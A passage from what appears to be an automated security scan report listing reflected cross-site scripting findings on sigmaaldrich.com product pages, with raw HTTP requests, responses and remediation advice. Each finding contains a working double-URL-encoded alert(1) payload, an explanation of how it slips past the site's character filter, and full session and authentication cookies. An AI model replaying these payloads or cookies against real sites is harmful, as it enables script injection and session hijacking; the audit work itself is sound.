WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:43 GMT
Content-Length: 28964
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-sciencef1cd6";alert(1)//57771a356b5/life-science-services/cloning-transfection.html","E404") ;
   </script>
...[SNIP]...

1.560. http://www.sigmaaldrich.com/life-science/life-science-services/cloning-transfection.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/life-science-services/cloning-transfection.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df0f8%2522%253balert%25281%2529%252f%252f18aa5d384c4 was submitted in the REST URL parameter 2. This input was echoed as df0f8";alert(1)//18aa5d384c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character. The web server decodes the path once (%2522 becomes %22, which passes the filter) and the application then decodes it a second time (%22 becomes "), so the filter never sees the quote it is meant to block.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically. The final response carries a 404 Not Found status, but browsers render the body of a 404 page and execute its scripts, so the error status is not a mitigation. The sink is the cmCreateErrorTag(...) call on the site's error page, which embeds the full requested URL; because every path segment reaches that same call, the issue recurs once per REST URL parameter on each path.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/life-science-servicesdf0f8%2522%253balert%25281%2529%252f%252f18aa5d384c4/cloning-transfection.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:46 GMT
Content-Length: 28964
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/life-science-servicesdf0f8";alert(1)//18aa5d384c4/cloning-transfection.html","E404") ;
   </script>
...[SNIP]...

1.561. http://www.sigmaaldrich.com/life-science/life-science-services/cloning-transfection.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/life-science-services/cloning-transfection.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0b78%2522%253balert%25281%2529%252f%252f2e28e64ede0 was submitted in the REST URL parameter 3. This input was echoed as a0b78";alert(1)//2e28e64ede0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/life-science-services/a0b78%2522%253balert%25281%2529%252f%252f2e28e64ede0 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:48 GMT
Content-Length: 28939
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/life-science-services/a0b78";alert(1)//2e28e64ede0","E404") ;
   </script>
...[SNIP]...

1.562. http://www.sigmaaldrich.com/life-science/life-science-services/mass-spectrometry.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/life-science-services/mass-spectrometry.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2ee6%2522%253balert%25281%2529%252f%252f2e2c85bc37d was submitted in the REST URL parameter 1. This input was echoed as f2ee6";alert(1)//2e2c85bc37d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-sciencef2ee6%2522%253balert%25281%2529%252f%252f2e2c85bc37d/life-science-services/mass-spectrometry.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:42 GMT
Content-Length: 28961
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-sciencef2ee6";alert(1)//2e2c85bc37d/life-science-services/mass-spectrometry.html","E404") ;
   </script>
...[SNIP]...

1.563. http://www.sigmaaldrich.com/life-science/life-science-services/mass-spectrometry.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/life-science-services/mass-spectrometry.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1fef4%2522%253balert%25281%2529%252f%252fe974b804620 was submitted in the REST URL parameter 2. This input was echoed as 1fef4";alert(1)//e974b804620 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/life-science-services1fef4%2522%253balert%25281%2529%252f%252fe974b804620/mass-spectrometry.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:44 GMT
Content-Length: 28961
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/life-science-services1fef4";alert(1)//e974b804620/mass-spectrometry.html","E404") ;
   </script>
...[SNIP]...

1.564. http://www.sigmaaldrich.com/life-science/life-science-services/mass-spectrometry.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/life-science-services/mass-spectrometry.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a19c7%2522%253balert%25281%2529%252f%252fc2f9597928f was submitted in the REST URL parameter 3. This input was echoed as a19c7";alert(1)//c2f9597928f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/life-science-services/a19c7%2522%253balert%25281%2529%252f%252fc2f9597928f HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; 